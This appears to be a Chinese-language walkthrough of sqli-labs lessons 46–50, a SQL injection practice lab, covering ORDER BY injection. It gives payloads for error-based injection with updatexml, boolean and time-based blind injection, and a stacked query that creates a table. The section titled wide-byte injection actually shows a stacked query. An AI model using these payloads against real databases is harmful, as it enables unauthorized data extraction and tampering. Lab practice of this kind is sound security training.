sqli-labs lesson46-50

1.lesson-46 报错注入

判断注入：

整型注入

一部分代码，是是查询的排序语句，所以不能用union select 联合查询

SELECT * FROM users ORDER BY $id

查数据库名：

?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)

2.lesson-47 报错注入

判断注入

为单引号注入

查数据库名：

?sort=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- +

3.lesson-48 布尔或时间盲注

判断注入

为整型注入

布尔：

使用rand函数判断，rand在mysql中是生成[0,1)之间的随机数，当随机数种子相同时(rand(22),22被称作随机数种子)，生成的随机数相同

而判断的语句，为真时就是1，为假是就是0，通过观察数据的排列情况，来判断数据是否正确

语句为真时排列顺序

语句为假时数据排序：

判断数据库长度：

?sort=rand(length(database())=8)

时间盲注：

判断数据库长度：

?sort=1 and if(length(database())=8,sleep(0.5),1)

因为有20条数据，所以大约需要10s

4.lesson-49 时间盲注

判断注入：

为单引号注入

时间盲注：

判断数据库长度：

?sort=1' and if(length(database())=8,sleep(0.5),1)-- +

这题没法用布尔盲注了，符号没法闭合

5.lesson-50 宽字节注入

判断注入

为整型注入

报错注入：

查数据库名

?sort=1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)

宽字节注入：

?sort=1;create table  ba like users;

参考文章：sqlilabs过关手册注入天书